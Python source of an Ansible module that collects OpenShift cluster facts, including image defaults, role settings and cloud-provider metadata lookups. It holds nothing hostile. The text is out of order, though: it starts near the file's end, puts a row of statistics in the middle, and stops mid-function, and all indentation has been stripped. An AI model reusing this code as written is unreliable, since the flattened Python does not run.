# If we're actually defining a buildoverrides config then create admission_plugin_config
# then merge buildoverrides[config] structure into admission_plugin_config
if 'config' in buildoverrides:
if 'admission_plugin_config' not in facts['master']:
facts['master']['admission_plugin_config'] = dict()
facts['master']['admission_plugin_config'].update(buildoverrides['config'])
return facts
# pylint: disable=too-many-statements
def set_container_facts_if_unset(facts):
""" Set containerized facts.
Args:
facts (dict): existing facts
Returns:
dict: the facts dict updated with the generated containerization
facts
"""
deployment_type = facts['common']['deployment_type']
if deployment_type == 'openshift-enterprise':
master_image = 'openshift3/ose'
cli_image = master_image
node_image = 'openshift3/node'
ovs_image = 'openshift3/openvswitch'
etcd_image = 'registry.access.redhat.com/rhel7/etcd'
pod_image = 'openshift3/ose-pod'
router_image = 'openshift3/ose-haproxy-router'
registry_image = 'openshift3/ose-docker-registry'
deployer_image = 'openshift3/ose-deployer'
else:
master_image = 'openshift/origin'
cli_image = master_image
node_image = 'openshift/node'
ovs_image = 'openshift/openvswitch'
etcd_image = 'registry.access.redhat.com/rhel7/etcd'
pod_image = 'openshift/origin-pod'
router_image = 'openshift/origin-haproxy-router'
registry_image = 'openshift/origin-docker-registry'
deployer_image = 'openshift/origin-deployer'
facts['common']['is_atomic'] = os.path.isfile('/run/ostree-booted')
# If openshift_docker_use_system_container is set and is True ....
if 'use_system_container' in list(facts['docker'].keys()):
if facts['docker']['use_system_container']:
# ... set the service name to container-engine
facts['docker']['service_name'] = 'container-engine'
if 'is_containerized' not in facts['common']:
facts['common']['is_containerized'] = facts['common']['is_atomic']
if 'cli_image' not in facts['common']:
facts['common']['cli_image'] = cli_image
if 'pod_image' not in facts['common']:
facts['common']['pod_image'] = pod_image
if 'router_image' not in facts['common']:
facts['common']['router_image'] = router_image
if 'registry_image' not in facts['common']:
facts['common']['registry_image'] = registry_image
if 'deployer_image' not in facts['common']:
facts['common']['deployer_image'] = deployer_image
if 'etcd' in facts and 'etcd_image' not in facts['etcd']:
facts['etcd']['etcd_image'] = etcd_image
if 'master' in facts and 'master_image' not in facts['master']:
facts['master']['master_image'] = master_image
facts['master']['master_system_image'] = master_image
if 'node' in facts:
if 'node_image' not in facts['node']:
facts['node']['node_image'] = node_image
facts['node']['node_system_image'] = node_image
if 'ovs_image' not in facts['node']:
facts['node']['ovs_image'] = ovs_image
facts['node']['ovs_system_image'] = ovs_image
if safe_get_bool(facts['common']['is_containerized']):
facts['common']['admin_binary'] = '/usr/local/bin/oadm'
facts['common']['client_binary'] = '/usr/local/bin/oc'
return facts
def set_installed_variant_rpm_facts(facts):
""" Set RPM facts of installed variant
Args:
facts (dict): existing facts
Returns:
dict: the facts dict updated with installed_variant_rpms
"""
installed_rpms = []
for base_rpm in ['openshift', 'atomic-openshift', 'origin']:
optional_rpms = ['master', 'node', 'clients', 'sdn-ovs']
variant_rpms = [base_rpm] + \
['{0}-{1}'.format(base_rpm, r) for r in optional_rpms] + \
['tuned-profiles-%s-node' % base_rpm]
for rpm in variant_rpms:
exit_code, _, _ = module.run_command(['rpm', '-q', rpm]) # noqa: F405
if exit_code == 0:
installed_rpms.append(rpm)
facts['common']['installed_variant_rpms'] = installed_rpms
return facts
class OpenShiftFactsInternalError(Exception):
"""Origin Facts Error"""
pass
class OpenShiftFactsUnsupportedRoleError(Exception):
"""Origin Facts Unsupported Role Error"""
pass
class OpenShiftFactsFileWriteError(Exception):
"""Origin Facts File Write Error"""
pass
class OpenShiftFactsMetadataUnavailableError(Exception):
"""Origin Facts Metadata Unavailable Error"""
pass
class OpenShiftFacts(object):
""" Origin Facts
Attributes:
facts (dict): facts for the host
Args:
module (AnsibleModule): an AnsibleModule object
role (str): role for setting local facts
filename (str): local facts file to use
local_facts (dict): local facts to set
additive_facts_to_overwrite (list): additive facts to overwrite in jinja
'.' notation ex: ['master.named_certificates']
protected_facts_to_overwrite (list): protected facts to overwrite in jinja
'.' notation ex: ['master.master_count']
Raises:
OpenShiftFactsUnsupportedRoleError:
"""
known_roles = ['builddefaults',
'buildoverrides',
'cloudprovider',
'common',
'docker',
'etcd',
'hosted',
'master',
'node',
'logging',
'loggingops',
'metrics']
# Disabling too-many-arguments, this should be cleaned up as a TODO item.
# pylint: disable=too-many-arguments,no-value-for-parameter
def __init__(self, role, filename, local_facts,
additive_facts_to_overwrite=None,
openshift_env=None,
openshift_env_structures=None,
protected_facts_to_overwrite=None):
self.changed = False
self.filename = filename
if role not in self.known_roles:
raise OpenShiftFactsUnsupportedRoleError(
"Role %s is not supported by this module" % role
)
self.role = role
# Collect system facts and preface each fact with 'ansible_'.
try:
# pylint: disable=too-many-function-args,invalid-name
self.system_facts = ansible_facts(module, ['hardware', 'network', 'virtual', 'facter']) # noqa: F405
additional_facts = {}
for (k, v) in self.system_facts.items():
additional_facts["ansible_%s" % k.replace('-', '_')] = v
self.system_facts.update(additional_facts)
except UnboundLocalError:
# ansible-2.2,2.3
self.system_facts = get_all_facts(module)['ansible_facts'] # noqa: F405
self.facts = self.generate_facts(local_facts,
additive_facts_to_overwrite,
openshift_env,
openshift_env_structures,
protected_facts_to_overwrite)
def generate_facts(self,
local_facts,
additive_facts_to_overwrite,
openshift_env,
openshift_env_structures,
protected_facts_to_overwrite):
""" Generate facts
Args:
local_facts (dict): local_facts for overriding generated defaults
additive_facts_to_overwrite (list): additive facts to overwrite in jinja
'.' notation ex: ['master.named_certificates']
openshift_env (dict): openshift_env facts for overriding generated defaults
protected_facts_to_overwrite (list): protected facts to overwrite in jinja
'.' notation ex: ['master.master_count']
Returns:
dict: The generated facts
"""
local_facts = self.init_local_facts(local_facts,
additive_facts_to_overwrite,
openshift_env,
openshift_env_structures,
protected_facts_to_overwrite)
roles = local_facts.keys()
if 'common' in local_facts and 'deployment_type' in local_facts['common']:
deployment_type = local_facts['common']['deployment_type']
else:
deployment_type = 'origin'
if 'common' in local_facts and 'deployment_subtype' in local_facts['common']:
deployment_subtype = local_facts['common']['deployment_subtype']
else:
deployment_subtype = 'basic'
defaults = self.get_defaults(roles, deployment_type, deployment_subtype)
provider_facts = self.init_provider_facts()
facts = apply_provider_facts(defaults, provider_facts)
facts = merge_facts(facts,
local_facts,
additive_facts_to_overwrite,
protected_facts_to_overwrite)
facts = migrate_oauth_template_facts(facts)
facts['current_config'] = get_current_config(facts)
facts = set_url_facts_if_unset(facts)
facts = set_project_cfg_facts_if_unset(facts)
facts = set_node_schedulability(facts)
facts = set_selectors(facts)
facts = set_identity_providers_if_unset(facts)
facts = set_deployment_facts_if_unset(facts)
facts = set_sdn_facts_if_unset(facts, self.system_facts)
facts = set_container_facts_if_unset(facts)
facts = build_kubelet_args(facts)
facts = build_controller_args(facts)
facts = build_api_server_args(facts)
facts = set_version_facts_if_unset(facts)
facts = set_dnsmasq_facts_if_unset(facts)
facts = set_aggregate_facts(facts)
facts = set_etcd_facts_if_unset(facts)
facts = set_proxy_facts(facts)
facts = set_builddefaults_facts(facts)
facts = set_buildoverrides_facts(facts)
if not safe_get_bool(facts['common']['is_containerized']):
facts = set_installed_variant_rpm_facts(facts)
facts = set_nodename(facts)
return dict(openshift=facts)
def get_defaults(self, roles, deployment_type, deployment_subtype):
""" Get default fact values
Args:
roles (list): list of roles for this host
Returns:
dict: The generated default facts
"""
defaults = {}
ip_addr = self.system_facts['ansible_default_ipv4']['address']
exit_code, output, _ = module.run_command(['hostname', '-f']) # noqa: F405
hostname_f = output.strip() if exit_code == 0 else ''
hostname_values = [hostname_f, self.system_facts['ansible_nodename'],
self.system_facts['ansible_fqdn']]
hostname = choose_hostname(hostname_values, ip_addr).lower()
defaults['common'] = dict(ip=ip_addr,
public_ip=ip_addr,
deployment_type=deployment_type,
deployment_subtype=deployment_subtype,
hostname=hostname,
public_hostname=hostname,
portal_net='172.30.0.0/16',
client_binary='oc', admin_binary='oadm',
dns_domain='cluster.local',
debug_level=2,
config_base='/etc/origin')
if 'master' in roles:
defaults['master'] = dict(api_use_ssl=True, api_port='8443',
controllers_port='8444',
console_use_ssl=True,
console_path='/console',
console_port='8443', etcd_use_ssl=True,
etcd_hosts='', etcd_port='4001',
portal_net='172.30.0.0/16',
embedded_etcd=True, embedded_kube=True,
embedded_dns=True,
bind_addr='0.0.0.0',
session_max_seconds=3600,
session_name='ssn',
session_secrets_file='',
access_token_max_seconds=86400,
auth_token_max_seconds=500,
oauth_grant_method='auto',
dynamic_provisioning_enabled=True,
max_requests_inflight=500)
if 'node' in roles:
defaults['node'] = dict(labels={}, annotations={},
iptables_sync_period='30s',
local_quota_per_fsgroup="",
set_node_ip=False)
if 'docker' in roles:
docker = dict(disable_push_dockerhub=False,
options='--log-driver=journald')
# NOTE: This is a workaround for a dnf output racecondition that can occur in
# some situations. See https://bugzilla.redhat.com/show_bug.cgi?id=918184
if self.system_facts['ansible_pkg_mgr'] == 'dnf':
rpm_rebuilddb()
version_info = get_docker_version_info()
if version_info is not None:
docker['api_version'] = version_info['api_version']
docker['version'] = version_info['version']
docker['gte_1_10'] = LooseVersion(version_info['version']) >= LooseVersion('1.10')
hosted_registry_insecure = get_hosted_registry_insecure()
if hosted_registry_insecure is not None:
docker['hosted_registry_insecure'] = hosted_registry_insecure
docker['service_name'] = 'docker'
defaults['docker'] = docker
if 'cloudprovider' in roles:
defaults['cloudprovider'] = dict(kind=None)
if 'hosted' in roles or self.role == 'hosted':
defaults['hosted'] = dict(
etcd=dict(
storage=dict(
kind=None,
volume=dict(
name='etcd',
size='1Gi'
),
nfs=dict(
directory='/exports',
options='*(rw,root_squash)'
),
host=None,
access=dict(
modes=['ReadWriteOnce']
),
create_pv=True,
create_pvc=False
)
),
registry=dict(
storage=dict(
kind=None,
volume=dict(
name='registry',
size='5Gi'
),
nfs=dict(
directory='/exports',
options='*(rw,root_squash)'),
glusterfs=dict(
endpoints='glusterfs-registry-endpoints',
path='glusterfs-registry-volume',
readOnly=False,
swap=False,
swapcopy=True),
host=None,
access=dict(
modes=['ReadWriteMany']
),
create_pv=True,
create_pvc=True
)
),
router=dict()
)
defaults['logging'] = dict(
storage=dict(
kind=None,
volume=dict(
name='logging-es',
size='10Gi'
),
nfs=dict(
directory='/exports',
options='*(rw,root_squash)'
),
host=None,
access=dict(
modes=['ReadWriteOnce']
),
create_pv=True,
create_pvc=False
)
)
defaults['loggingops'] = dict(
storage=dict(
kind=None,
volume=dict(
name='logging-es-ops',
size='10Gi'
),
nfs=dict(
directory='/exports',
options='*(rw,root_squash)'
),
host=None,
access=dict(
modes=['ReadWriteOnce']
),
create_pv=True,
create_pvc=False
)
)
defaults['metrics'] = dict(
deploy=False,
duration=7,
resolution='10s',
storage=dict(
kind=None,
volume=dict(
name='metrics',
size='10Gi'
),
nfs=dict(
directory='/exports',
options='*(rw,root_squash)'
),
host=None,
access=dict(
modes=['ReadWriteOnce']
),
create_pv=True,
create_pvc=False
)
)
return defaults
def guess_host_provider(self):
""" Guess the host provider
Returns:
dict: The generated default facts for the detected provider
"""
# TODO: cloud provider facts should probably be submitted upstream
product_name = self.system_facts['ansible_product_name']
product_version = self.system_facts['ansible_product_version']
virt_type = self.system_facts['ansible_virtualization_type']
virt_role = self.system_facts['ansible_virtualization_role']
bios_vendor = self.system_facts['ansible_system_vendor']
provider = None
metadata = None
if bios_vendor == 'Google':
provider = 'gce'
metadata_url = ('http://metadata.google.internal/'
'computeMetadata/v1/?recursive=true')
headers = {'Metadata-Flavor': 'Google'}
metadata = get_provider_metadata(metadata_url, True, headers,
True)
# Filter sshKeys and serviceAccounts from gce metadata
if metadata:
metadata['project']['attributes'].pop('sshKeys', None)
metadata['instance'].pop('serviceAccounts', None)
elif virt_type == 'xen' and virt_role == 'guest' and re.match(r'.*\.amazon$', product_version):
provider = 'aws'
metadata_url = 'http://169.254.169.254/latest/meta-data/'
metadata = get_provider_metadata(metadata_url)
elif re.search(r'OpenStack', product_name):
provider = 'openstack'
metadata_url = ('http://169.254.169.254/openstack/latest/'
'meta_data.json')
metadata = get_provider_metadata(metadata_url, True, None,
True)
if metadata:
ec2_compat_url = 'http://169.254.169.254/latest/meta-data/'
metadata['ec2_compat'] = get_provider_metadata(
ec2_compat_url
)
# disable pylint maybe-no-member because overloaded use of
# the module name causes pylint to not detect that results
# is an array or hash
# pylint: disable=maybe-no-member
# Filter public_keys and random_seed from openstack metadata
metadata.pop('public_keys', None)
metadata.pop('random_seed', None)
if not metadata['ec2_compat']:
metadata = None
return dict(name=provider, metadata=metadata)
def init_provider_facts(self):
""" Initialize the provider facts
Returns:
dict: The normalized provider facts
"""
provider_info = self.guess_host_provider()
provider_facts = normalize_provider_facts(
provider_info.get('name'),
provider_info.get('metadata')
)
return provider_facts
@staticmethod
def split_openshift_env_fact_keys(openshift_env_fact, openshift_env_structures):
""" Split openshift_env facts based on openshift_env structures.
Args:
openshift_env_fact (string): the openshift_env fact to split
ex: 'openshift_cloudprovider_openstack_auth_url'
openshift_env_structures (list): a list of structures to determine fact keys
ex: ['openshift.cloudprovider.openstack.*']
Returns:
list: a list of keys that represent the fact
ex: ['openshift', 'cloudprovider', 'openstack', 'auth_url']
"""
# By default, we'll split an openshift_env fact by underscores.
fact_keys = openshift_env_fact.split('_')
# Determine if any of the provided variable structures match the fact.
matching_structure = None
if openshift_env_structures is not None:
for structure in openshift_env_structures:
if re.match(structure, openshift_env_fact):
matching_structure = structure
# Fact didn't match any variable structures so return the default fact keys.
if matching_structure is None:
return fact_keys
final_keys = []
structure_keys = matching_structure.split('.')
for structure_key in structure_keys:
# Matched current key. Add to final keys.
if structure_key == fact_keys[structure_keys.index(structure_key)]:
final_keys.append(structure_key)
# Wildcard means we will be taking everything from here to the end of the fact.
elif structure_key == '*':
final_keys.append('_'.join(fact_keys[structure_keys.index(structure_key):]))
# Shouldn't have gotten here, return the fact keys.
else:
return fact_keys
return final_keys
# Disabling too-many-branches and too-many-locals.
# This should be cleaned up as a TODO item.
# pylint: disable=too-many-branches, too-many-locals
def init_local_facts(self, facts=None,
additive_facts_to_overwrite=None,
openshift_env=None,
openshift_env_structures=None,
protected_facts_to_overwrite=None):
""" Initialize the local facts
Args:
facts (dict): local facts to set
additive_facts_to_overwrite (list): additive facts to overwrite in jinja
'.' notation ex: ['master.named_certificates']
openshift_env (dict): openshift env facts to set
protected_facts_to_overwrite (list): protected facts to overwrite in jinja
'.' notation ex: ['master.master_count']
Returns:
dict: The result of merging the provided facts with existing
local facts
"""
changed = False
facts_to_set = dict()
if facts is not None:
facts_to_set[self.role] = facts
if openshift_env != {} and openshift_env is not None:
for fact, value in iteritems(openshift_env):
oo_env_facts = dict()
current_level = oo_env_facts
keys = self.split_openshift_env_fact_keys(fact, openshift_env_structures)[1:]
if len(keys) > 0 and keys[0] != self.role:
continue
for key in keys:
if key == keys[-1]:
current_level[key] = value
elif key not in current_level:
current_level[key] = dict()
current_level = current_level[key]
facts_to_set = merge_facts(orig=facts_to_set,
new=oo_env_facts,
additive_facts_to_overwrite=[],
protected_facts_to_overwrite=[])
local_facts = get_local_facts_from_file(self.filename)
migrated_facts = migrate_local_facts(local_facts)
new_local_facts = merge_facts(migrated_facts,
facts_to_set,
additive_facts_to_overwrite,
protected_facts_to_overwrite)
if 'docker' in new_local_facts:
# remove duplicate and empty strings from registry lists, preserving order
for cat in ['additional', 'blocked', 'insecure']:
key = '{0}_registries'.format(cat)
if key in new_local_facts['docker']:
val = new_local_facts['docker'][key]
if isinstance(val, string_types):
val = [x.strip() for x in val.split(',')]
seen = set()
new_local_facts['docker'][key] = list()
for registry in val:
if registry not in seen and registry != '':
seen.add(registry)
new_local_facts['docker'][key].append(registry)
# Convert legacy log_options comma sep string to a list if present:
if 'log_options' in new_local_facts['docker'] and \
isinstance(new_local_facts['docker']['log_options'], string_types):
new_local_facts['docker']['log_options'] = new_local_facts['docker']['log_options'].split(',')
new_local_facts = self.remove_empty_facts(new_local_facts)
if new_local_facts != local_facts:
self.validate_local_facts(new_local_facts)
changed = True
if not module.check_mode: # noqa: F405
save_local_facts(self.filename, new_local_facts)
self.changed = changed
return new_local_facts
def remove_empty_facts(self, facts=None):
""" Remove empty facts
Args:
facts (dict): facts to clean
"""
facts_to_remove = []
for fact, value in iteritems(facts):
if isinstance(facts[fact], dict):
facts[fact] = self.remove_empty_facts(facts[fact])
else:
if value == "" or value == [""] or value is None:
facts_to_remove.append(fact)
for fact in facts_to_remove:
del facts[fact]
return facts
def validate_local_facts(self, facts=None):
""" Validate local facts
Args:
facts (dict): local facts to validate
"""
invalid_facts = dict()
invalid_facts = self.validate_master_facts(facts, invalid_facts)
if invalid_facts:
msg = 'Invalid facts detected:\n'
# pylint: disable=consider-iterating-dictionary
for key in invalid_facts.keys():
msg += '{0}: {1}\n'.format(key, invalid_facts[key])
module.fail_json(msg=msg, changed=self.changed) # noqa: F405
# disabling pylint errors for line-too-long since we're dealing
# with best effort reduction of error messages here.
# disabling errors for too-many-branches since we require checking
# many conditions.
# pylint: disable=line-too-long, too-many-branches
@staticmethod
def validate_master_facts(facts, invalid_facts):
""" Validate master facts
Args:
facts (dict): local facts to validate
invalid_facts (dict): collected invalid_facts
Returns:
dict: Invalid facts
"""
if 'master' in facts:
# openshift.master.session_auth_secrets
if 'session_auth_secrets' in facts['master']:
session_auth_secrets = facts['master']['session_auth_secrets']
if not issubclass(type(session_auth_secrets), list):
invalid_facts['session_auth_secrets'] = 'Expects session_auth_secrets is a list.'
elif 'session_encryption_secrets' not in facts['master']:
invalid_facts['session_auth_secrets'] = ('openshift_master_session_encryption secrets must be set '
'if openshift_master_session_auth_secrets is provided.')
elif len(session_auth_secrets) != len(facts['master']['session_encryption_secrets']):
invalid_facts['session_auth_secrets'] = ('openshift_master_session_auth_secrets and '
'openshift_master_session_encryption_secrets must be '
'equal length.')
else:
for secret in session_auth_secrets:
if len(secret) < 32:
invalid_facts['session_auth_secrets'] = ('Invalid secret in session_auth_secrets. '
'Secrets must be at least 32 characters in length.')
# openshift.master.session_encryption_secrets
if 'session_encryption_secrets' in facts['master']:
session_encryption_secrets = facts['master']['session_encryption_secrets']
if not issubclass(type(session_encryption_secrets), list):
invalid_facts['session_encryption_secrets'] = 'Expects session_encryption_secrets is a list.'
elif 'session_auth_secrets' not in facts['master']:
invalid_facts['session_encryption_secrets'] = ('openshift_master_session_auth_secrets must be '
'set if openshift_master_session_encryption_secrets '
'is provided.')
else:
for secret in session_encryption_secrets:
if len(secret) not in [16, 24, 32]:
invalid_facts['session_encryption_secrets'] = ('Invalid secret in session_encryption_secrets. '
'Secrets must be 16, 24, or 32 characters in length.')
return invalid_facts
def main():
""" main """
# disabling pylint errors for global-variable-undefined and invalid-name
# for 'global module' usage, since it is required to use ansible_facts
# pylint: disable=global-variable-undefined, invalid-name
global module
module = AnsibleModule( # noqa: F405
argument_spec=dict(
role=dict(default='common', required=False,
choices=OpenShiftFacts.known_roles),
local_facts=dict(default=None, type='dict', required=False),
additive_facts_to_overwrite=dict(default=[], type='list', required=False),
openshift_env=dict(default={}, type='dict', required=False),
openshift_env_structures=dict(default=[], type='list', required=False),
protected_facts_to_overwrite=dict(default=[], type='list', required=False)
),
supports_check_mode=True,
add_file_common_args=True,
)
if not HAVE_DBUS:
module.fail_json(msg="This module requires dbus python bindings") # noqa: F405
module.params['gather_subset'] = ['hardware', 'network', 'virtual', 'facter'] # noqa: F405
module.params['gather_timeout'] = 10 # noqa: F405
module.params['filter'] = '*' # noqa: F405
role = module.params['role'] # noqa: F405
local_facts = module.params['local_facts'] # noqa: F405
additive_facts_to_overwrite = module.params['additive_facts_to_overwrite'] # noqa: F405
openshift_env = module.params['openshift_env'] # noqa: F405
openshift_env_structures = module.params['openshift_env_structures'] # noqa: F405
protected_facts_to_overwrite = module.params['protected_facts_to_overwrite'] # noqa: F405
fact_file = '/etc/ansible/facts.d/openshift.fact'
openshift_facts = OpenShiftFacts(role,
fact_file,
local_facts,
additive_facts_to_overwrite,
openshift_env,
openshift_env_structures,
protected_facts_to_overwrite)
file_params = module.params.copy() # noqa: F405
file_params['path'] = fact_file
file_args = module.load_file_common_arguments(file_params) # noqa: F405
changed = module.set_fs_attributes_if_different(file_args, # noqa: F405
openshift_facts.changed)
return module.exit_json(changed=changed, # noqa: F405
ansible_facts=openshift_facts.facts)
if __name__ == '__main__':
main()
| 41.357999 | 129 | 0.57671 |
# Status: Permanently disabled to keep this module as self-contained as possible.
# pylint: disable=no-name-in-module, import-error, wrong-import-order
import copy
import errno
import json
import re
import io
import os
import yaml
import struct
import socket
from distutils.util import strtobool
from distutils.version import LooseVersion
from ansible.module_utils.six import string_types, text_type
from ansible.module_utils.six.moves import configparser
# ignore pylint errors related to the module_utils import
# pylint: disable=redefined-builtin, unused-wildcard-import, wildcard-import
# import module snippets
from ansible.module_utils.basic import * # noqa: F403
from ansible.module_utils.facts import * # noqa: F403
from ansible.module_utils.urls import * # noqa: F403
from ansible.module_utils.six import iteritems, itervalues
from ansible.module_utils.six.moves.urllib.parse import urlparse, urlunparse
from ansible.module_utils._text import to_native
HAVE_DBUS = False
try:
from dbus import SystemBus, Interface
from dbus.exceptions import DBusException
HAVE_DBUS = True
except ImportError:
pass
DOCUMENTATION = '''
---
module: openshift_facts
short_description: Cluster Facts
author: Jason DeTiberus
requirements: [ ]
'''
EXAMPLES = '''
'''
def migrate_docker_facts(facts):
params = {
'common': (
'additional_registries',
'insecure_registries',
'blocked_registries',
'options'
),
'node': (
'log_driver',
'log_options'
)
}
if 'docker' not in facts:
facts['docker'] = {}
# pylint: disable=consider-iterating-dictionary
for role in params.keys():
if role in facts:
for param in params[role]:
old_param = 'docker_' + param
if old_param in facts[role]:
facts['docker'][param] = facts[role].pop(old_param)
if 'node' in facts and 'portal_net' in facts['node']:
facts['docker']['hosted_registry_network'] = facts['node'].pop('portal_net')
# log_options was originally meant to be a comma separated string, but
# we now prefer an actual list, with backward compatibility:
if 'log_options' in facts['docker'] and \
isinstance(facts['docker']['log_options'], string_types):
facts['docker']['log_options'] = facts['docker']['log_options'].split(",")
return facts
# TODO: We should add a generic migration function that takes source and destination
# paths and does the right thing rather than one function for common, one for node, etc.
def migrate_common_facts(facts):
params = {
'node': ('portal_net'),
'master': ('portal_net')
}
if 'common' not in facts:
facts['common'] = {}
# pylint: disable=consider-iterating-dictionary
for role in params.keys():
if role in facts:
for param in params[role]:
if param in facts[role]:
facts['common'][param] = facts[role].pop(param)
return facts
def migrate_node_facts(facts):
params = {
'common': ('dns_ip'),
}
if 'node' not in facts:
facts['node'] = {}
# pylint: disable=consider-iterating-dictionary
for role in params.keys():
if role in facts:
for param in params[role]:
if param in facts[role]:
facts['node'][param] = facts[role].pop(param)
return facts
def migrate_hosted_facts(facts):
if 'master' in facts:
if 'router_selector' in facts['master']:
if 'hosted' not in facts:
facts['hosted'] = {}
if 'router' not in facts['hosted']:
facts['hosted']['router'] = {}
facts['hosted']['router']['selector'] = facts['master'].pop('router_selector')
if 'registry_selector' in facts['master']:
if 'hosted' not in facts:
facts['hosted'] = {}
if 'registry' not in facts['hosted']:
facts['hosted']['registry'] = {}
facts['hosted']['registry']['selector'] = facts['master'].pop('registry_selector')
return facts
def migrate_admission_plugin_facts(facts):
if 'master' in facts:
if 'kube_admission_plugin_config' in facts['master']:
if 'admission_plugin_config' not in facts['master']:
facts['master']['admission_plugin_config'] = dict()
# Merge existing kube_admission_plugin_config with admission_plugin_config.
facts['master']['admission_plugin_config'] = merge_facts(facts['master']['admission_plugin_config'],
facts['master']['kube_admission_plugin_config'],
additive_facts_to_overwrite=[],
protected_facts_to_overwrite=[])
# Remove kube_admission_plugin_config fact
facts['master'].pop('kube_admission_plugin_config', None)
return facts
def migrate_local_facts(facts):
migrated_facts = copy.deepcopy(facts)
migrated_facts = migrate_docker_facts(migrated_facts)
migrated_facts = migrate_common_facts(migrated_facts)
migrated_facts = migrate_node_facts(migrated_facts)
migrated_facts = migrate_hosted_facts(migrated_facts)
migrated_facts = migrate_admission_plugin_facts(migrated_facts)
return migrated_facts
def first_ip(network):
atoi = lambda addr: struct.unpack("!I", socket.inet_aton(addr))[0] # noqa: E731
itoa = lambda addr: socket.inet_ntoa(struct.pack("!I", addr)) # noqa: E731
(address, netmask) = network.split('/')
netmask_i = (0xffffffff << (32 - atoi(netmask))) & 0xffffffff
return itoa((atoi(address) & netmask_i) + 1)
def hostname_valid(hostname):
if (not hostname or
hostname.startswith('localhost') or
hostname.endswith('localdomain') or
# OpenShift will not allow a node with more than 63 chars in name.
len(hostname) > 63):
return False
return True
def choose_hostname(hostnames=None, fallback=''):
hostname = fallback
if hostnames is None:
return hostname
ip_regex = r'\A\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z'
ips = [i for i in hostnames if i is not None and isinstance(i, string_types) and re.match(ip_regex, i)]
hosts = [i for i in hostnames if i is not None and i != '' and i not in ips]
for host_list in (hosts, ips):
for host in host_list:
if hostname_valid(host):
return host
return hostname
def query_metadata(metadata_url, headers=None, expect_json=False):
result, info = fetch_url(module, metadata_url, headers=headers) # noqa: F405
if info['status'] != 200:
raise OpenShiftFactsMetadataUnavailableError("Metadata unavailable")
if expect_json:
return module.from_json(to_native(result.read())) # noqa: F405
else:
return [to_native(line.strip()) for line in result.readlines()]
def walk_metadata(metadata_url, headers=None, expect_json=False):
metadata = dict()
for line in query_metadata(metadata_url, headers, expect_json):
if line.endswith('/') and not line == 'public-keys/':
key = line[:-1]
metadata[key] = walk_metadata(metadata_url + line,
headers, expect_json)
else:
results = query_metadata(metadata_url + line, headers,
expect_json)
if len(results) == 1:
# disable pylint maybe-no-member because overloaded use of
# the module name causes pylint to not detect that results
# is an array or hash
# pylint: disable=maybe-no-member
metadata[line] = results.pop()
else:
metadata[line] = results
return metadata
def get_provider_metadata(metadata_url, supports_recursive=False,
headers=None, expect_json=False):
try:
if supports_recursive:
metadata = query_metadata(metadata_url, headers,
expect_json)
else:
metadata = walk_metadata(metadata_url, headers,
expect_json)
except OpenShiftFactsMetadataUnavailableError:
metadata = None
return metadata
def normalize_gce_facts(metadata, facts):
for interface in metadata['instance']['networkInterfaces']:
int_info = dict(ips=[interface['ip']], network_type='gce')
int_info['public_ips'] = [ac['externalIp'] for ac
in interface['accessConfigs']]
int_info['public_ips'].extend(interface['forwardedIps'])
_, _, network_id = interface['network'].rpartition('/')
int_info['network_id'] = network_id
facts['network']['interfaces'].append(int_info)
_, _, zone = metadata['instance']['zone'].rpartition('/')
facts['zone'] = zone
# GCE currently only supports a single interface
facts['network']['ip'] = facts['network']['interfaces'][0]['ips'][0]
pub_ip = facts['network']['interfaces'][0]['public_ips'][0]
facts['network']['public_ip'] = pub_ip
# Split instance hostname from GCE metadata to use the short instance name
facts['network']['hostname'] = metadata['instance']['hostname'].split('.')[0]
# TODO: attempt to resolve public_hostname
facts['network']['public_hostname'] = facts['network']['public_ip']
return facts
def normalize_aws_facts(metadata, facts):
for interface in sorted(
metadata['network']['interfaces']['macs'].values(),
key=lambda x: x['device-number']
):
int_info = dict()
var_map = {'ips': 'local-ipv4s', 'public_ips': 'public-ipv4s'}
for ips_var, int_var in iteritems(var_map):
ips = interface.get(int_var)
if isinstance(ips, string_types):
int_info[ips_var] = [ips]
else:
int_info[ips_var] = ips
if 'vpc-id' in interface:
int_info['network_type'] = 'vpc'
else:
int_info['network_type'] = 'classic'
if int_info['network_type'] == 'vpc':
int_info['network_id'] = interface['subnet-id']
else:
int_info['network_id'] = None
facts['network']['interfaces'].append(int_info)
facts['zone'] = metadata['placement']['availability-zone']
# TODO: actually attempt to determine default local and public ips
# by using the ansible default ip fact and the ipv4-associations
# from the ec2 metadata
facts['network']['ip'] = metadata.get('local-ipv4')
facts['network']['public_ip'] = metadata.get('public-ipv4')
# TODO: verify that local hostname makes sense and is resolvable
facts['network']['hostname'] = metadata.get('local-hostname')
# TODO: verify that public hostname makes sense and is resolvable
facts['network']['public_hostname'] = metadata.get('public-hostname')
return facts
def normalize_openstack_facts(metadata, facts):
# openstack ec2 compat api does not support network interfaces and
# the version tested on did not include the info in the openstack
# metadata api, should be updated if neutron exposes this.
facts['zone'] = metadata['availability_zone']
local_ipv4 = metadata['ec2_compat']['local-ipv4'].split(',')[0]
facts['network']['ip'] = local_ipv4
facts['network']['public_ip'] = metadata['ec2_compat']['public-ipv4']
for f_var, h_var, ip_var in [('hostname', 'hostname', 'local-ipv4'),
('public_hostname', 'public-hostname', 'public-ipv4')]:
try:
if socket.gethostbyname(metadata['ec2_compat'][h_var]) == metadata['ec2_compat'][ip_var]:
facts['network'][f_var] = metadata['ec2_compat'][h_var]
else:
facts['network'][f_var] = metadata['ec2_compat'][ip_var]
except socket.gaierror:
facts['network'][f_var] = metadata['ec2_compat'][ip_var]
return facts
def normalize_provider_facts(provider, metadata):
if provider is None or metadata is None:
return {}
# TODO: test for ipv6_enabled where possible (gce, aws do not support)
# and configure ipv6 facts if available
# TODO: add support for setting user_data if available
facts = dict(name=provider, metadata=metadata,
network=dict(interfaces=[], ipv6_enabled=False))
if provider == 'gce':
facts = normalize_gce_facts(metadata, facts)
elif provider == 'aws':
facts = normalize_aws_facts(metadata, facts)
elif provider == 'openstack':
facts = normalize_openstack_facts(metadata, facts)
return facts
def set_node_schedulability(facts):
if 'node' in facts:
if 'schedulable' not in facts['node']:
if 'master' in facts:
facts['node']['schedulable'] = False
else:
facts['node']['schedulable'] = True
return facts
# pylint: disable=too-many-branches
def set_selectors(facts):
selector = "region=infra"
if 'hosted' not in facts:
facts['hosted'] = {}
if 'router' not in facts['hosted']:
facts['hosted']['router'] = {}
if 'selector' not in facts['hosted']['router'] or facts['hosted']['router']['selector'] in [None, 'None']:
facts['hosted']['router']['selector'] = selector
if 'registry' not in facts['hosted']:
facts['hosted']['registry'] = {}
